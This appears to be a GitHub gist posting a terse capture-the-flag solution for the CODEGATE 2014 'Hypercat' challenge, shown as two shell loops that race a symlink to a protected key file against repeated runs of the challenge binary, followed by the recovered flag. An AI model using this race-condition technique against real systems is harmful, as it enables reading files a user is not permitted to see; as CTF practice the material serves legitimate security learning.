Skip to content

Instantly share code, notes, and snippets.

@eggpod
Last active August 29, 2015 13:56
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save eggpod/d5e53078809fded1a2a4 to your computer and use it in GitHub Desktop.
Save eggpod/d5e53078809fded1a2a4 to your computer and use it in GitHub Desktop.
# CODEGATE2014pre Hypercat
#
#   ∧∧
# と⌒っ゚ω゚)ノ○
#
# Race Condition
[Console 1]
$ while true; do rm a; ln -s /home/hypercat/key a; sleep 0.03; rm a; touch a;sleep 0.03; done;
[Console 2]
$ while true; do /home/hypercat/hypercat a; done
HArD0ar3_vxRT2ALIZ4T1on_IS_4lwWaY5_FuN
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment